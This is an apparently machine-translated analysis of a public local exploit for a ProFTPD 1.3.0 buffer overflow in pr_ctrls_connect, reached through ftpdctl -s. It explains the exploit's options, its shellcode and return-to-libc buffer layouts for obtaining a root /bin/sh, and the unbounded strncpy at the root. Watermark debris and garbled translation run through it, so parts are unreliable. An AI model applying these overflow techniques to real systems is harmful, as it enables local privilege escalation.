ProFTPd Local pr_ctrls_connect vulnerability-ftpdctl Vulnerability and attack code analysis

Attack Code URL: http://www.exploit-db.com/exploits/394/

1, the implementation of the environment:
1, ProFTPD 1.3.0/1.3.0a
2, when compiling proftpd. The--enable-ctrls option must be turned on
./configure--enable-ctrls
2, the implementation of the parameters:
[Email protected]:~# gcc 394.c-o 394
[Email protected]:~#/394–s <option> [-P <option_path>] [-O <option_offset>]
The value after the-S is two different ways of attacking, with values of 1 and 2 to choose from. The 1th way to use the current environment, the 2nd way is to use the RET-TO-LIBC way.

Note: the RETURN-TO-LIBC attack. The return address in its stack is replaced with the address of an instruction, and a portion of the stack is overwritten to provide its parameters. This would allow an attacker to invoke an existing function without injecting malicious code into the program.
The parameter-o-parameter-P is of no great significance.

However, it helps to use the attack code.
3. Code Analysis
The Code Run command is: [email protected]:~#./394–s 1
3.1 Analysis Program parameters

The No. 236 line of the program. is to analyze the parameters of 394.c program execution. getopt (int argc, char * const argv[], const char * optstring) are used to parse command-line parameters.

The parameters argc and argv are the number and content of the parameters passed by main (). The parameter optstring represents the option string to be processed.

The letter in the option string is followed by the colon ":". Indicates that there are related arguments, and the global variable Optarg points to this additional argument. Then the following is done for different parameters. Because the only one that finally works is the-s a parameter. The following will focus on analyzing-s parameters.
The getopt is processed to the-s parameter because of the presence of the colon ":" in optstring. The Optarg will point to the next parameter of-S, which is 1.

The program then assigns the value to the variable Wybor in the 246 row. Wait for the next step to process.

watermark/2/text/ahr0cdovl2jsb2cuy3nkbi5uzxqvagfuy2hhb3fp/font/5a6l5l2t/fontsize/400/fill/i0jbqkfcma==/ Dissolve/70/gravity/southeast ">
3.2 Determining the validity of the parameters
Because the 394.C program only provides 2 ways to exploit the vulnerability, the 241 line in the program limits the-S to 1 or 2. Other values, regardless of value, are considered illegal and will cause the program to exit directly.

In addition, there is a variable path in the program that specifies the absolute path to the vulnerability program, and the value defaults to/usr/local/bin/ftpdctl. The Pr_ctrls_connect () function in CTRLS.C is also called in Proftpdserver's ftpdctl. One of the strncpy () in this function is a buffer overflow point for the vulnerability.

In the 267 line of 394.c, the file is opened by fopen () to determine if the file under that path is valid.

3.3 Constructing overflow data and running an attack
Finally the attack statement is 298 rows and 324 rows of execle (Path,path, "-S", buf,0,sh);
int execle (const char *path, const char *arg, ..., char * const envp[]);
Using the Execle function to replace the current process with a new process, the path parameter indicates that the name of the program you want to start contains the path name, and the arg parameter indicates the number of parameters to start the program, typically the first parameter to run a command name.

Passing environment variables to processes that need to be replaced ENVP data that holds environment information
The variable buf is used to store overflow data, except for a large number of meaningless data, and most importantly the/BIN/SH entry address. When the buffer overflows. The program is booted and jumps to/bin/sh, allowing you to run arbitrary instructions.
The construction of overflow data mainly involves two variables: buf[229] and sh[2], because the arguments after-s (1 or 2) determine the two different ways to exploit the vulnerability, the following two ways to separate descriptive narrative:
Mode 1 is wybor=1, buf in addition to the first two bytes of data "/a", the remaining 227 bytes all the entry address for/bin/sh.

watermark/2/text/ahr0cdovl2jsb2cuy3nkbi5uzxqvagfuy2hhb3fp/font/5a6l5l2t/fontsize/400/fill/i0jbqkfcma==/ Dissolve/70/gravity/southeast ">
Envp[] uses 0x90 as the fill character. and write the pre-constructed shellcode at the end. The main functions of Shellcode are running: setuid (0), setgid (0),/bin/sh and exit (0).

watermark/2/text/ahr0cdovl2jsb2cuy3nkbi5uzxqvagfuy2hhb3fp/font/5a6l5l2t/fontsize/400/fill/i0jbqkfcma==/ Dissolve/70/gravity/southeast ">
Mode 2 is wybor=2, because in the way of using RET-TO-LIBC, the data in BUF in addition to the first byte is '/', the last 3 bytes is Libc_system address, libc_next__ address and/bin/sh address in turn, The remaining 225 bytes are padding character 0x41.

Envp[] is used as a fill character and writes the string "/bin/sh" at the end.

3. Analysis Results
From the above analysis, it can be seen that the 394.C program is mainly through the direct call Proftpdserver command ftpdctl-s to attack the vulnerability. This is because the command ftpdctl needs to establish a local socket connection with the server to communicate between processes. When a socket connection is established, FTPDCTL.C invokes the function pr_ctrls_connect (char *socket_file) defined in line 874 in CTRLS.C.
The main purpose of Pr_ctrls_connect (char *socket_file) is to create a Af_unix type of streaming socket and connect to the server. The local socket address for the connection is ctrl_sock. And Ctrl_sock is a struct SOCKADDR_UN structure, it has two parameters sun_family, Sun_path.

The sun_family is a protocol family and is assigned a value of Af_unix for local inter-process communication. Sun_path is the path to the local file and is assigned to Sun_path in the program using Socket_file.

Unfortunately, when the assignment was made, strncpy (), which did not check the bounds of the data, was able to see that the function written to memory in 923 rows of the program was strncpy (Ctrl_sock.sun_path,socket_file,strlen (socket_file ), it is clear that this function does not have a boundary check on the data being written. That is, it is possible to write arbitrary-length data to a memory area of size sizeof (Ctrl_sock).

Ctrl_sock is a local variable defined in function Pr_ctrls_connect (), where the computer opens a memory store of size sizeof (Ctrl_sock) in the dynamic store for the function call. At the same time, the dynamic store is also used to hold the field information and function return addresses at the time of the function call, which creates a condition for buffer overflow attacks. As the 394.c source Gaze says, we can overflow the buffer by controlling the length of the socket_file.
Indeed 394.c is exploiting this vulnerability to construct ultra-long data containing/bin/sh return addresses. Use the parameter-s to replace the normal socket_file path when calling Ftpdctrl. When CTRLS.C runs strncpy (). This extra-long shellcode causes the buffer to overflow, thus moving to run/bin/sh to achieve the purpose of the attack.

ProFTPd Local pr_ctrls_connect vulnerability-ftpdctl Vulnerability and attack code analysis